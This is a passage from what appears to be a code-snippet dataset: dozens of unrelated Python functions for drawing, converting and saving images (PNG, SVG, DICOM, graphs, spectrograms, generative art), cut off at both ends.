range(3):\n if i == 2:\n for k in range(1,max_num_colors_per + 1):\n color_palette[i].append(k*max_gradient)\n else:\n for k in range(1,num_colors_per + 1):\n color_palette[i].append(k*gradient)\n # print(max_num_colors_per)\n # print(color_palette)\n\n\n ## Legend\n x_legend = self.width - self.width_of_legend\n y_legend = 75\n legend_width = 145\n legend_height = (self.number_of_motifs * 15) + 8\n ctx.rectangle(x_legend,y_legend,legend_width,legend_height)\n ctx.set_source_rgb(0,0,0)\n ctx.stroke()\n legend_line_length = 35\n count = 1\n for i in range(3):\n for j in range(len(color_palette[i])):\n ctx.move_to(x_legend + 5, y_legend + (count*15))\n ctx.line_to(x_legend + legend_line_length, y_legend + (count*15))\n if i == 0:\n ctx.set_source_rgb(color_palette[i][j],0,0)\n if i == 1:\n ctx.set_source_rgb(0,color_palette[i][j],0)\n if i == 2:\n ctx.set_source_rgb(0,0,color_palette[i][j])\n ctx.set_line_width(3)\n ctx.stroke()\n\n ctx.move_to((x_legend + legend_line_length) + 10, y_legend + (count*15))\n ctx.set_font_size(11)\n ctx.select_font_face(\"Arial\",cairo.FONT_SLANT_NORMAL,cairo.FONT_WEIGHT_NORMAL)\n ctx.set_source_rgb(0,0,0)\n ctx.show_text(self.list_of_motifs[count-1])\n\n count += 1\n\n for i in range(len(self.list_of_motif_objects)):\n current_motif_obj = self.list_of_motif_objects[i]\n current_length_of_seq = len(current_motif_obj.sequence)\n current_motif_coords = current_motif_obj.motif_coordinates\n current_motif_sequences = current_motif_obj.motif_sequences\n current_exon_coords = current_motif_obj.exon_coordinates\n\n width_left = self.width - current_length_of_seq - self.width_of_legend\n \n ## Draw main sequence line\n ctx.move_to(left_spacing,(i*line_spacing) + line_depth) \n ctx.line_to(left_spacing + 
current_length_of_seq,(i*line_spacing) + line_depth)\n ctx.set_source_rgb(0,0,0)\n ctx.set_line_width(2)\n ctx.stroke()\n\n ## Draw the exon\n x1 = left_spacing + current_exon_coords[0][0]\n y1 = (i*line_spacing) + line_depth - 20\n rec_width = current_exon_coords[0][1] - current_exon_coords[0][0]\n rec_height = 40\n ctx.rectangle(x1,y1,rec_width,rec_height)\n ctx.set_source_rgb(0,0,0)\n ctx.stroke()\n\n ## Loop to draw all motifs\n for j in range(len(current_motif_coords)):\n ctx.move_to(left_spacing + current_motif_coords[j][0],(i*line_spacing) + line_depth) \n ctx.line_to(left_spacing + current_motif_coords[j][0] + 2,(i*line_spacing) + line_depth)\n motif_num = current_motif_coords[j][2]\n if(motif_num < num_colors_per):\n ctx.set_source_rgb(color_palette[0][motif_num],0,0)\n if(motif_num >= num_colors_per and motif_num < (2*num_colors_per)):\n ctx.set_source_rgb(0,color_palette[1][motif_num-num_colors_per],0)\n if(motif_num >= (2*num_colors_per)):\n ctx.set_source_rgb(0,0,color_palette[2][motif_num-(2*num_colors_per)])\n ctx.set_line_width(15)\n ctx.stroke()\n\n ## adding header text\n ctx.move_to(left_spacing, (i*line_spacing) + header_depth)\n ctx.set_font_size(17)\n ctx.select_font_face(\"Arial\",cairo.FONT_SLANT_NORMAL,cairo.FONT_WEIGHT_NORMAL)\n ctx.set_source_rgb(0,0,0)\n ctx.show_text(current_motif_obj.header)\n\n # ## adding sequence text (MAYBE MAKE THIS OPTIONAL FLAG?)\n # disp_length = 80\n # last_k = 0\n # for k in range(len(current_motif_obj.sequence)//disp_length):\n # current_seq = current_motif_obj.sequence[k*disp_length:(k*disp_length)+disp_length]\n # ctx.move_to(50, (i*512) + 125 + (25*k))\n # ctx.set_font_size(14)\n # ctx.select_font_face(\"Arial\",cairo.FONT_SLANT_NORMAL,cairo.FONT_WEIGHT_NORMAL)\n # ctx.set_source_rgb(0,0,0)\n # ctx.show_text(current_seq)\n # last_k = k\n # final_num = ((len(current_motif_obj.sequence)//disp_length)*disp_length)\n # the_rest = current_motif_obj.sequence[final_num:]\n # ctx.move_to(50, (i*512) + 125 + (25*(last_k + 1)))\n # ctx.set_font_size(14)\n # ctx.select_font_face(\"Arial\",cairo.FONT_SLANT_NORMAL,cairo.FONT_WEIGHT_NORMAL)\n # ctx.set_source_rgb(0,0,0)\n # ctx.show_text(the_rest)\n\n\n\n surface.finish()", "def ps2svg(sFile, method=\"default\"):\n\n sBack = \"\"\n oErr = ErrHandle()\n try:\n # Read the file\n sText = \"\"\n with open(sFile, \"r\") as f:\n sText = f.read()\n if method == \"default\":\n sBack = ps2svg_string(sText)\n elif method == \"simple\":\n sBack = ps2svg_simple(sText)\n except:\n msg = oErr.get_error_message()\n oErr.DoError(\"ps2svg\")\n\n # Return what we have gathered\n return sBack", "def create_raster_datapackage(pk_type, path, file_flag, out_path):\n process_source(pk_type, path, file_flag, out_path)", "def iter_png(path: str, translate: bool = True, verify_crc: bool = True) -> Iterator[tuple]:\n\n with open(path, \"rb\") as fr:\n yield from iter_png_fp(fr, translate=translate, verify_crc=verify_crc)", "def _parse_single(filename, label, image_size=IMAGE_SIZE):\n # Decode and convert image to appropriate type\n image = tf.image.decode_png(tf.read_file(filename), channels=image_size[2])\n image = tf.image.convert_image_dtype(image, tf.float32) # Also scales from [0, 255] to [0, 1)\n # Resize according to module requirements\n image = tf.image.resize_images(image, image_size[:2])\n return image, label", "def saving(file_path, file_type='png'):\n\n index_saving = 1\n while os.path.exists(file_path + \"_{}.{}\".format(index_saving, file_type)):\n index_saving += 1\n\n plt.savefig(file_path + 
\"_{}.{}\".format(index_saving, file_type))", "def save_as_png(path):\r\n for _, _, filename in walk(path):\r\n for f in filename:\r\n medical_image = pydicom.dcmread(path + f)\r\n shape = medical_image.pixel_array.shape\r\n # Convert to float to avoid overflow or underflow losses\r\n brain_image = medical_image.pixel_array.astype(float)\r\n # Rescaling grey scale between 0-255\r\n scaled_image = (np.maximum(brain_image, 0) / brain_image.max()) * 255.0\r\n # Convert to uint\r\n scaled_image = np.uint8(scaled_image)\r\n # Write the PNG file\r\n with open(f'{path}png/{f.strip(\".dcm\")}.png', 'wb') as png_file:\r\n w = png.Writer(shape[1], shape[0], greyscale=True)\r\n w.write(png_file, scaled_image)", "async def api_faviconPng(self):\n # SECURITY: We control the path of the file so using send_file is ok.\n return self.reply_file(\n sirepo.resource.static(\"img\", \"favicon.png\"),\n content_type=\"image/png\",\n )", "def saveGraph (self, filename) :\n\t\tss = \"digraph {\\n\"\n\t\tfor key, rules in self.production_rules.items() :\n\t\t\tfor rule in rules :\n\t\t\t\tr = [op.val for op in rule]\n\t\t\t\tr = [i.replace (\"-\", \"\") for i in r]\n\t\t\t\tr = [i.replace (\".\", \"\") for i in r]\n\t\t\t\tr = [i.replace (\"\\'\\'\", \"eps\") for i in r]\n\t\t\t\tr = [i.replace (\"\\\"\\\"\", \"eps\") for i in r]\n\t\t\t\tr = [i.replace (\"/\", \"_\") for i in r]\n\t\t\t\tk = key.replace (\"-\", \"\")\n\t\t\t\tk = k.replace (\"/\", \"_\")\n\t\t\t\tk = k.replace (\".\", \"_tok\")\n\t\t\t\tss += \"\\t\" + k + \" -> \" \n\t\t\t\tss += \" -> \".join (r)\n\t\t\t\tss += \" ;\\n\"\n\t\tss += \"}\"\n\t\tfilestream = open (filename + '.dot', 'w') \n\t\tfilestream.write(ss)\n\t\tfilestream.close ()\n\t\tcmd = 'dot -Tpng -o ' + filename + '.png ' + filename + '.dot'\n\t\tos.system (cmd)\n\t\tcmd = 'rm ' + filename + '.dot'\n\t\tos.system (cmd)", "def map_fn(self, path, label):\n image = tf.image.decode_png(tf.io.read_file(path))\n image = tf.image.convert_image_dtype(image, tf.float32)\n if self.img_size is not None:\n image = tf.image.resize(image, self.img_size)\n return image, label", "def OnBuildPNGs(self, e):\n if (not defaults.use_tex):\n msg = \"LaTeX is disabled in the defaults.py file. To use this functionality, change the\"\n msg += \" use_tex option to True and restart the GUI.\"\n ShowMessage(msg, kind='warn')\n return\n question = \"Quantity code formulas are displayed using PNG images, which need to be generated.\"\n question += \"\\n\\n\\nImages should only be generated if they do not already exist or\"\n question += \" the quantity codes have changed, e.g., more custom outputs have been added.\"\n question += \"\\n\\n\\nThis can take ~60 sec, do you want to proceed?\"\n proceed = AskYesNo(question, title='Generate LaTeX Formula Images?')\n if (not proceed): return\n\n question = \"Choose a path where the images will be saved. 
The default value from defaults.py is shown.\"\n path = AskText(question, default=defaults.quantity_code_image_path, title=\"Where to store images?\")\n if (path is None): return\n defaults.quantity_code_image_path = path # user overrode this quantity, remember for later\n\n question = \"If image files already exist, do you want to overwrite them?\"\n overwrite = AskYesNo(question, title='Overwrite Existing Files?')\n\n # call render routine and display a progress bar\n Nq = len(self.mainparent.nmlpanel.output_quantities.quantities)\n offsets = list(self.mainparent.nmlpanel.output_quantities.offsets.keys())\n\n P = ProgressBar(Nq)\n P(0)\n for i,Q in enumerate(self.mainparent.nmlpanel.output_quantities.quantities):\n if (Q.name in offsets): continue\n render_tex(Q.code, Q.tex, defaults.quantity_code_image_path, overwrite=overwrite)\n\n P(i+1) # update progress bar", "def import_reference_images():\n symbols = []\n my_path = os.getcwd()\n my_path = my_path.replace('DIP_drivers', 'references\\\\')\n symbols_list = [f for f in listdir(my_path) if '.jpg' in str(f)]\n\n for image in symbols_list:\n path = my_path + image\n gray_image = cv2.imread(path, 0)\n ret, gray_image = cv2.threshold(gray_image, 100, 255, cv2.THRESH_TRUNC)\n\n img = Symbol(gray_image, image)\n symbols.append(img)\n return symbols", "def save(self, *args, **kwargs):\n if self.icon:\n xml = svg.validate_svg(self.icon.file.read())\n square = svg.make_square(xml)\n colors = svg.color_icon(square)\n super(Issue, self).save(*args, **kwargs)\n for key, content in colors.items():\n filename = self.icon_color(key)\n if self.icon.storage.exists(filename):\n self.icon.storage.delete(filename)\n self.icon.storage.save(filename, svg.as_file(content))\n else:\n super(Issue, self).save(*args, **kwargs)", "def process():\r\n st.title(\"Process in GauGAN\")\r\n st.subheader(\"Now choose the styles you wish to process with the paintings.\")\r\n\r\n # Styles dictionary\r\n styles_dict = {\"Afternoon 1\": 1, \"Afternoon 2\": 2, \"Sunset 1\": 3,\r\n \"Sunset 2 Red Sun\": 4, \"Afternoon 3\": 5, \"Afternoon 4\": 6, \"Sunset 3\": 7,\r\n \"Sunset 4\": 8, \"Sunset 5\": 9, \"Sunset 6\": 10}\r\n\r\n # Allow the user to choose the keys from the styles dictionary\r\n styles = st.multiselect(\"Styles: \",list(styles_dict.keys()),\"Afternoon 1\")\r\n\r\n # set the directory where the pictures will be imported from\r\n DIR = 'tmp/'\r\n # Calculate the number of files that are going to be processed\r\n number_of_files = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])\r\n # Show it in the sidebar\r\n st.sidebar.subheader(\"Total pictures to process: %s\"%number_of_files)\r\n # If the user has chosen to process them:\r\n if st.button(\"Start processing with GauGAN\"):\r\n if number_of_files > 0:\r\n # Then process it: take the directory where the going-to-be-imported pictures exist,\r\n # Process them, and save them in 'files' directory.\r\n make_nature(styles_dict,DIR[:-1],'files',styles)\r\n else: # the number of files is zero\r\n st.warning(\"There are no files to process.\")", "def generate_art(filename, x_size=350, y_size=350):\n # Functions for red, green, and blue channels - where the magic happens!\n r_lb = random.randint(6, 10)\n g_lb = random.randint(6, 10)\n b_lb = random.randint(6, 10)\n red_function = build_random_function(r_lb, r_lb+1)\n green_function = build_random_function(g_lb, g_lb+1)\n blue_function = build_random_function(b_lb, b_lb+1)\n\n # Create image and loop over all pixels\n im = 
Image.new(\"RGB\", (x_size, y_size))\n pixels = im.load()\n for i in range(x_size):\n for j in range(y_size):\n x = remap_interval(i, 0, x_size, -1, 1)\n y = remap_interval(j, 0, y_size, -1, 1)\n pixels[i, j] = (\n color_map(evaluate_random_function(red_function, x, y)),\n color_map(evaluate_random_function(green_function, x, y)),\n color_map(evaluate_random_function(blue_function, x, y))\n )\n im.save(filename+'.png')\n return 'saved'", "def image(self, path):\n im = Image.open(path).convert(\"RGB\")\n # Convert the RGB image in printable image\n self._convert_and_print_image(im)", "def handle_as_file(view: sublime.View, point: int, string: str):\n\n name = osp.basename(string)\n file, folder = get_file(view, string, name)\n\n # if file doesn't exist, return\n if not osp.isfile(file):\n return\n\n # does the file need conversion ?\n need_conversion = file.endswith(formats_to_convert)\n ext = name.rsplit('.', 1)[1]\n\n # if the file needs conversion, convert it and read data from the resulting png\n if need_conversion:\n ext = \".png\"\n # keep the image's file and name for later use\n conv_file = file\n\n # create a temporary file\n temp_png = osp.join(TEMP_DIR, \"temp_png.png\")\n\n # use the magick command of Imagemagick to convert the image to png\n magick(file, temp_png)\n\n file = temp_png\n\n with open(file, \"rb\") as img:\n encoded = str(base64.b64encode(img.read()), \"utf-8\")\n\n width, height, real_width, real_height, size = get_data(view, file)\n\n def on_navigate(href):\n\n if href == \"save\":\n if need_conversion:\n save(conv_file, name, \"file\")\n else:\n save(file, name, \"file\", folder)\n elif href == \"save_as\":\n convert(conv_file if need_conversion else file, \"file\")\n else:\n sublime.active_window().open_file(file)\n\n view.show_popup(\n TEMPLATE % (width, height, ext, encoded, real_width, real_height,\n str(size // 1024) + \"KB\" if size >= 1024 else str(size) + 'B'),\n sublime.HIDE_ON_MOUSE_MOVE_AWAY,\n point,\n *view.viewport_extent(),\n on_navigate=on_navigate)", "def output_quantized_to_palette(self, palette, filename):\n dist = euclidean_distances(\n palette.lab_array, self.lab_array, squared=True).T\n min_ind = np.argmin(dist, axis=1)\n quantized_lab_array = palette.lab_array[min_ind, :]\n img = lab2rgb(quantized_lab_array.reshape((self.h, self.w, self.d)))\n imsave(filename, img)", "def decode_file(source, palette):\n\n (CHRStart, CHRSize) = get_CHR_data_position(source)\n charRowCount = CHRSize // 256 # 16 characters/row\n\n img = Image.new(\"P\", (128, charRowCount * 8), 0)\n img.putpalette(itertools.chain.from_iterable(palette))\n\n source.seek(CHRStart)\n for (y, pixelRow) in enumerate(decode_pixel_rows(source, charRowCount)):\n for (x, value) in enumerate(pixelRow):\n img.putpixel((x, y), value)\n\n return img", "def convert_to_raw(file):\n\n img = Image.open(file)\n img = img.convert('L') # convert to 8 bits per pixels\n (x, y) = img.size\n\n pixels = bytearray(list(img.getdata()))\n\n filename, file_extension = os.path.splitext(file)\n file2 = file.replace(file_extension, '.dat')\n file_name = str(x) + 'x' + str(y) + 'x8x1' + '_' + file2\n\n # print(file_name)\n\n with open(file_name, 'wb') as f:\n f.write(pixels)\n\n return file_name", "def create_png(input_filename, output_filename_w, output_filename_s, image_width, image_height, fft_size, f_max, f_min, wavefile, palette, channel):\n \n print \"processing file %s:\\n\\t\" % input_file,\n \n audio_file = audiolab.sndfile(input_filename, 'read') #opens the wavfile; audio_file is an object now\n \n 
samples_per_pixel = audio_file.get_nframes() / float(image_width)\n nyquist_freq = (audio_file.get_samplerate() / 2) + 0.0\n \"\"\"\n Initializes AudioProcessor class, which does FFT analysis and spits \n out amplitudes and frequencies to the SpectrogramImage and WaveformImage \n classes below later. For a stereo wav file, this selects a single channel \n to analyze. We might want to analyze both channels to give more input to\n the visualizer,though.\n \"\"\"\n processor = AudioProcessor(audio_file, fft_size, channel, numpy.hanning)\n \n if wavefile==1:\n waveform = WaveformImage(image_width, image_height, palette)\n spectrogram = SpectrogramImage(image_width, image_height, fft_size, f_max, f_min, nyquist_freq, palette)\n \n for x in range(image_width):\n #shows progress\n if x % (image_width/10) == 0:\n sys.stdout.write('.')\n sys.stdout.flush()\n \n seek_point = int(x * samples_per_pixel)\n next_seek_point = int((x + 1) * samples_per_pixel)\n \n (spectral_centroid, db_spectrum) = processor.spectral_centroid(seek_point)\n \n #let's have a look at the spectral centroid and the db_spectrum\n #print \"Spectral Centroid:\" + str(spectral_centroid)\n #print \"DB Spectrum:\" + str(db_spectrum)\n \n if wavefile==1:\n #aha! The peaks and spectral centroid make up the waveform.\n #Since the spectral centroid indicates timbre (often referred to as color),\n #it's probably what colors the waveform.\n peaks = processor.peaks(seek_point, next_seek_point)\n #let's have a look at these peaks\n #print \"Peaks:\" + str(peaks)\n waveform.draw_peaks(x, peaks, spectral_centroid)\n \n spectrogram.draw_spectrum(x, db_spectrum)\n \n if wavefile==1:\n waveform.save(output_filename_w)\n spectrogram.save(output_filename_s)\n \n print \" done\"", "def post_process_svg(self):\n post_processor = PostProcessor(svg_path=self.rendered_file_path)\n\n post_processor.post_process(graph_representation=self.graph_representation)\n\n post_processor.write()\n\n self.display.display(\"The graph has been exported to {}\".format(self.rendered_file_path))\n\n return self.rendered_file_path", "def copy_png_fp(\n fin: IO[bytes], fout: IO[bytes], filter_chunks: Optional[Callable[[bytes], bool]] = None, verify_crc: bool = False\n) -> None:\n\n filter_chunks = filter_chunks or (lambda chunk_type: True)\n\n for length, chunk_type, chunk, crc in iter_png_fp(fin, translate=False, verify_crc=verify_crc):\n if filter_chunks(chunk_type):\n fout.write(length)\n fout.write(chunk_type)\n fout.write(chunk)\n fout.write(crc)", "def save_png(self, filename):\n post_script = self.canvas.postscript().encode()\n img = Image.open(io.BytesIO(post_script))\n img.save(filename, format=\"PNG\")", "def export_graph(graph, name_file, format_export):\n im_name = ('{}.' 
+ format_export).format('./' + name_file)\n    if (format_export == \"png\"):\n        graph.write_png(im_name)\n    elif (format_export == \"dot\"):\n        graph.write_dot(im_name)\n    else:\n        raise LookupError", "def on_pushButton_2_clicked(self):\n        # TODO: not implemented yet\n        try:\n            str='str.png'\n            process_pic.graphics ().process (str)\n            self.click=\"process\"\n            pixMap = QPixmap(\"temp.png\").scaled(self.label.width(),self.label.height())\n            self.label.setPixmap(pixMap)\n        except:\n            button=QMessageBox.about(self, 'Notice', 'Please import an image into the blank area before processing')\n        else:\n            pass\n\n\n\n        #os.popen('python process_pic.py')", "def image(self):\n        # TODO: make sure this method works for png, gif, tiff\n        if self.has_metadata:\n            self.extract_metadata()\n        tempdir_path = self.make_tempdir()\n        tempfile_path = os.path.join(tempdir_path, self.filename)\n        warnings.simplefilter('error', Image.DecompressionBombWarning)\n        try: # Do image conversions\n            img_in = Image.open(self.src_path)\n            img_out = Image.frombytes(img_in.mode, img_in.size, img_in.tobytes())\n            img_out.save(tempfile_path)\n            self.src_path = tempfile_path\n        except Exception as e: # Catch decompression bombs\n            # TODO: change this from all Exceptions to specific DecompressionBombWarning\n            self.add_error(e, \"Caught exception (possible decompression bomb?) while translating file {}.\".format(self.src_path))\n            self.make_dangerous()\n        self.add_file_string('Image file')\n        self.set_property('processing_type', 'image')", "def write(self, chars, output, format='png'):\n        im = self.generate_image(chars)\n        return im.save(output, format=format)", "def generate_art(filename, x_size=350, y_size=350):\n    # Functions for red, green, and blue channels - where the magic happens!\n    \n    red_function = build_random_function(7,15)\n    green_function = build_random_function(7,15)\n    blue_function = build_random_function(7,15)\n    \n    # Create image and loop over all pixels\n    im = Image.new(\"RGB\", (x_size, y_size))\n    pixels = im.load()\n    for i in range(x_size):\n        for j in range(y_size):\n            x = remap_interval(i, 0, x_size, -1, 1)\n            y = remap_interval(j, 0, y_size, -1, 1)\n            pixels[i, j] = (\n                color_map(evaluate_random_function(red_function, x, y)),\n                color_map(evaluate_random_function(green_function, x, y)),\n                color_map(evaluate_random_function(blue_function, x, y))\n                )\n\n    im.save(filename)", "def main():\n    p = argparse.ArgumentParser(description='Convert images into unicode')\n    p.add_argument('image', metavar='<path>', type=str,\n                   help='path to the file, use - for stdin')\n    p.add_argument('--no-x256', action='store_false', dest='x256', default=True,\n                   help='prints with x256 unicode coloring')\n    p.add_argument('--char-set', metavar='<name>', default='default',\n                   help='prints with character set (e.g. 
windows)')\n args = p.parse_args()\n print_image_as_unicode(args.image, char_set=CHAR_SETS[args.char_set],\n x256=args.x256)", "def _process_image(filename, coder):\n # Read the image file.\n with tf.gfile.FastGFile(filename, 'rb') as f:\n image_data = f.read()\n \n # Convert any PNG to JPEG's for consistency.\n if _is_png(filename):\n print('Converting PNG to JPEG for %s' % filename)\n image_data = coder.png_to_jpeg(image_data)\n # Decode the RGB JPEG.\n image = coder.decode_jpeg(image_data)\n\n # Check that image converted to RGB\n assert len(image.shape) == 3\n height = image.shape[0]\n width = image.shape[1]\n assert image.shape[2] == 3\n\n return image_data, height, width", "def ExtractIconReps(icon_file_name):\n with open(icon_file_name, \"r\") as icon_file:\n icon_file_contents = icon_file.readlines()\n\n current_icon_size = REFERENCE_SIZE_DIP\n icon_sizes = []\n current_icon_representation = []\n icon_representations = {}\n for line in icon_file_contents:\n # Strip comments and empty lines.\n line = line.partition(CPP_COMMENT_DELIMITER)[0].strip()\n if not line:\n continue\n # Retrieve sizes specified by CANVAS_DIMENSIONS to ensure icons are added in\n # sorted order by size descending.\n if line.startswith(CANVAS_DIMENSIONS):\n sizes = re.findall(r\"\\d+\", line)\n if len(sizes) != 1:\n Error(\"Malformed {} line in {} - it should specify exactly one size.\"\n .format(CANVAS_DIMENSIONS, icon_file_name))\n icon_sizes.append(int(sizes[0]))\n\n # All icons except the first / default icon must start with\n # \"CANVAS_DIMENSIONS\", so rely on it here as a icon delimiter.\n if current_icon_representation:\n icon_representations = AddIconToDictionary(\n icon_file_name, current_icon_representation, current_icon_size,\n icon_representations)\n current_icon_representation = []\n current_icon_size = icon_sizes[-1]\n\n current_icon_representation.append(line)\n if current_icon_representation:\n icon_representations = AddIconToDictionary(\n icon_file_name, current_icon_representation, current_icon_size,\n icon_representations)\n\n if not icon_representations:\n Error(\"Didn't find any icons in {}.\".format(icon_file_name))\n\n if len(icon_representations) != len(icon_sizes):\n icon_sizes.insert(0, REFERENCE_SIZE_DIP)\n if sorted(icon_sizes, reverse=True) != icon_sizes:\n Error(\"The icons in {} should be sorted in descending order of size.\"\n .format(icon_file_name))\n return icon_representations", "def save(self, fileName=None):\n if fileName:\n pass\n else:\n fileName = 'scheme_part_{}.svg'.format(self._number_of_schemes)\n\n print('Scheme saved to the file {}'.format(fileName))\n plt.savefig(fileName)", "def write_map(self, file_name):\n\n if self.pixel == \"HEALPIX\":\n hp.fitsfunc.write_map(file_name, self.data, overwrite=True)\n if self.pixel == \"CAR\":\n enmap.write_map(file_name, self.data)", "def draw(dot_file_path, jupyter=True):\n s = gv.Source.from_file(dot_file_path)\n\n # using display(s) will draw the graph but will not embed it\n # permanently in the notebook. 
To embed it permanently,\n # must generate temporary image file and use Image().\n # display(s)\n\n x = s.render(\"tempo123\", format='png', view=False)\n os.remove(\"tempo123\")\n if jupyter:\n display(Image(x))\n else:\n open_image(\"tempo123.png\").show()", "def write_image(path, tokens, weights):\n\n f = render_attn_inner(tokens, weights)\n f.savefig(path, bbox_inches=\"tight\", frameon=False)\n plt.close(f)", "def edit_symbol_node(node, filename):\n size = int(re.findall('\\d+', filename)[-1])\n log.info('New filename %s; size %s', filename, size)\n\n node.set('typeId', SYMBOL_ID)\n node.find('name').text = 'DLS symbol'\n\n # Use PV name from rule in control PV for tooltip etc.\n # Reference that PV in rule to avoid duplication.\n pv_name = node.find('.//pv').text\n pv_element = et.Element('pv_name')\n pv_element.text = pv_name\n node.append(pv_element)\n node.find('.//pv').text = '$(pv_name)'\n\n rule_element = node.find('.//rule')\n rule_element.set('prop_id', 'image_index')\n rule_element.set('out_exp', 'true')\n\n file_element = et.Element('image_file')\n file_element.text = filename\n\n num_element = et.Element('symbol_number')\n num_element.text = '0'\n\n img_size_element = et.Element('sub_image_width')\n img_size_element.text = str(size)\n\n node.append(file_element)\n node.append(num_element)\n node.append(img_size_element)\n node.remove(node.find('opi_file'))", "def pnghack(filepath, width=2000, height=2000):\t#cmd.png() doesnt work with api\n cmd.set('ray_trace_frames', 1) # Frames are raytraced before saving an image.\n cmd.viewport(width, height) # Set resolution\n cmd.mpng(filepath, 1, 1) # Use batch png mode with 1 frame only\n cmd.mplay() # cmd.mpng needs the animation to 'run'", "def decode_image(file_location=\"images/encoded_sample.png\"):\n encoded_image = Image.open(file_location)\n red_channel = encoded_image.split()[0]\n\n\n x_size = encoded_image.size[0]\n y_size = encoded_image.size[1]\n\n\n decoded_image = Image.new(\"RGB\", encoded_image.size)\n pixels = decoded_image.load()\n for x in range(x_size):\n for y in range(y_size):\n red_pixel = red_channel.getpixel((x,y))\n binary = bin(red_pixel)\n\n lsb = int(binary[-1])\n if(lsb == 0):\n pixels[x,y] = (0,0,0)\n elif(lsb == 1):\n pixels[x,y] = (255,255,255)\n\n pass\n decoded_image.save(\"images/decoded_image.png\")", "def output_beat_to_file(file_name, e):\n print(\"Writing to file:\", file_name)\n routine = gp.compile(e,pset)\n with open(file_name+\".raw\",'w') as f:\n for t in range(200000):\n f.write(chr(int(routine(t+1))%256))\n # Now convert to wav\n subprocess.call(SOX_COMMAND + \" \" + file_name + \".raw\" + \" \" + file_name + \".wav\", shell=True)\n subprocess.call(LAME_COMMAND + \" \" + file_name + \".wav\", shell=True)", "def __make_png(self, abspath_img_rgb):\n if not os.path.exists(DIR_PNG):\n os.makedirs(DIR_PNG)\n\n outsize = '{}%'.format(OUTSIZE_RGB)\n img_name_rgb = os.path.basename(abspath_img_rgb)\n suffix_extension_tif = Utils.get_suffix_tif(img_name_rgb)\n img_png = img_name_rgb.replace(suffix_extension_tif, '.png')\n path_img_png = os.path.join(DIR_PNG, img_png)\n\n command = \"gdal_translate -ot byte -of PNG -outsize {} {} \" \\\n \"-a_nodata 0 -q {} {}\".format(\n outsize, outsize, abspath_img_rgb, path_img_png\n )\n os.system(command)\n return os.path.join(DIR_PNG_TO_DB, img_png)", "def save_file(self, _filename):\n imgsize = (self.__resolution[0], self.__resolution[1])\n print imgsize\n\n if(self.__resolution[2] == 1):\n # grayscale -> convert to RGB\n bg_white = (255, 255, 255)\n img 
= Image.new(\"RGB\", imgsize, bg_white)\n\n for x in xrange(0, self.__resolution[0], 1):\n for y in xrange(0, self.__resolution[1], 1):\n col = self.get_color(_pos)\n # duplicate the channels\n ucharcol = (255 * col[0], 255 * col[0], 255 * col[0])\n img.putpixel((x, self.__resolution[1] - y - 1), ucharcol)\n\n elif(self.__resolution[2] == 3):\n # RGB\n bg_white = (255, 255, 255)\n img = Image.new(\"RGB\", imgsize, bg_white)\n\n for x in xrange(0, self.__resolution[0], 1):\n for y in xrange(0, self.__resolution[1], 1):\n col = self.get_color(_pos)\n ucharcol = (255 * col[0], 255 * col[1], 255 * col[2])\n img.putpixel((x, self.__resolution[1] - y - 1), ucharcol)\n\n elif(self.__resolution[2] == 4):\n # RGBA\n bg_white = (255, 255, 255, 255)\n img = Image.new(\"RGBA\", imgsize, bg_white)\n\n for x in xrange(0, self.__resolution[0], 1):\n for y in xrange(0, self.__resolution[1], 1):\n col = 255 * self.get_color((x, y))\n ucharcol = (int(col[0]), int(col[1]), int(col[2]), int(col[3]))\n img.putpixel((x, self.__resolution[1] - y - 1), ucharcol)\n else:\n raise StandardError, ('supported number of channels are 1, 3, and 4, only.')\n\n img.save(_filename)", "def print_image(indiv,name):\n routine = gp.compile(indiv,pset)\n output = gen_beat_output(routine)\n bits = np.array(map(bitlist,output)[0:24000]).transpose()\n plt.style.use('classic')\n plt.imshow(bits,interpolation='nearest',aspect='auto',cmap=plt.get_cmap('Greys'))\n plt.savefig(name+\".png\",dpi=150)", "def create_regfile(userinput, x, y, filename, color='blue', width=2):\n target_dir = userinput['OUTDIR']\n outputfile = target_dir + '/s_extraction/{}'.format(filename)\n\n logging.info('Writing region file {}'.format(filename))\n\n with open(outputfile, 'w') as file:\n file.write('global color={} width={} font=\"helvetica 15 normal roman\" highlite=1 \\n'\\\n .format(color,width))\n file.write('image\\n')\n\n for i in range(len(x)):\n newline = 'circle(' + str(x[i]) + ',' + str(y[i]) + ',7) \\n'\n file.write(newline)", "def process_image(self):\n pass", "def save():\n pl.savefig('/home/filippini/Documents/plot/RUN55/compa'+INFO_RUN+'.png')", "def __init__(self, filename):\r\n self.__output__ = open(format(filename, '08X') + '.gen', 'wb')", "def generate_art(filename, x_size=1920, y_size=1080):\n # Functions for red, green, and blue channels - where the magic happens!\n red_function = build_random_function(7,8)\n green_function = build_random_function(4,6)\n blue_function = build_random_function(3,5)\n\n # Create image and loop over all pixels\n im = Image.new(\"RGB\", (x_size, y_size))\n pixels = im.load()\n for i in range(x_size):\n for j in range(y_size):\n x = remap_interval(i, 0, x_size, -1, 1)\n y = remap_interval(j, 0, y_size, -1, 1)\n pixels[i, j] = (\n color_map(evaluate_random_function(red_function, x, y)),\n color_map(evaluate_random_function(green_function, x, y)),\n color_map(evaluate_random_function(blue_function, x, y))\n )\n\n im.save(filename)", "def draw_to_png(diagram, options, filename, forward=True):\n if not isinstance(diagram, dict):\n diagram = {\"\": dict}\n options = create_options(options)\n before_title = options.raildraw_title_before\n after_title = options.raildraw_title_after\n # Create an empty image to give size_of something to reference\n empty_image = cairo.ImageSurface(cairo.FORMAT_ARGB32, 1, 1)\n empty_context = cairo.Context(empty_image)\n width, height = 0, 0\n for name, d in diagram.items():\n w, h, l = size_of(empty_context, d, options)\n width, height = max(width, w), h + height\n height += 
len(diagram) * (before_title + after_title)\n image = cairo.ImageSurface(cairo.FORMAT_ARGB32, int(width + 16), int(height + 16))\n context = cairo.Context(image)\n x = 8\n y = 8\n for name, d in diagram.items():\n draw_text(context, x, y, options.raildraw_title_font, name + \":\")\n y += after_title\n draw_to_context(context, d, options, filename, forward, x, y)\n # FIXME: store the size as computed 10 or 20 lines above to avoid\n # having to compute it twice\n y += size_of(context, d, options)[1]\n y += before_title\n image.write_to_png(filename)", "def hogg_savefig(prefix):\n for fn in [prefix + \".png\"]: # , prefix + \".pdf\"]:\n print \"saving \" + fn\n plt.savefig(fn)\n return None", "def export(self):\n def get_export_cmd(svgfile, fmt, dpi, outfile):\n if _use_rsvg and os.name == 'posix':\n # A DPI of 72 must be set to convert from files generated with\n # Inkscape v1+ to get the correct page size.\n ret = os.system('rsvg-convert --version 1>/dev/null')\n if ret == 0:\n return ('rsvg-convert' +\n ' 